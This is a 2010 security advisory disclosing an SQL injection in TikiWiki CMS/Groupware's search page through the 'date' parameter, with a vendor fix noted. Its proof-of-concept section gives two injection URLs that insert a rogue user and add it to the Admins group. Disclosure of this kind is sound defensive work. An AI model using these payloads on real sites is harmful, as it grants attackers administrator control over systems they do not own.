Product: TikiWiki CMS/Groupware, Versions: 4.1, 3.4 LTS (Other versions may also be affected) Vendor: http://info.tikiwiki.org/ Impact: SQL injection Vulnerability Severity: HIGH Authors: Mateusz Drygas http://security.psnc.pl/ Advisory: http://security.psnc.pl/advisories/tikiwiki-4.1.txt [ISSUE] The search module in TikiWiki portal is prone to an SQL-injection vulnerability, which can be exploited by malicious people to conduct SQL injection attacks. [DETAILS] It was found that TikiWiki CMS/Groupware does not validate properly the "date" parameter value. http://[HOST]/?tiki-searchresults.php?highlight=misja&date=1 month));[SQLi] [POC] http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_users(email,login,password,hash) VALUES ('','bad_guy','lsjfsofasgfs',md5('lsjfsofasgfslsjfsofasgfs'));;--&search=>> http://[HOST]/tiki-searchresults.php?highlight=misja&date=1 month)); INSERT INTO users_usergroups (`userId`, `groupName`) VALUES([user_id],'Admins');;--&search=>> [SOLUTION] Edit the source code to ensure that input is properly sanitized. Update to Version 4.2 or 3.5 LTS or later [SUMMARY] Vendor has been informed about these bugs. Have a nice day. Copyright 2010, Mateusz Drygas, PSNC Security Team . All rights reserved.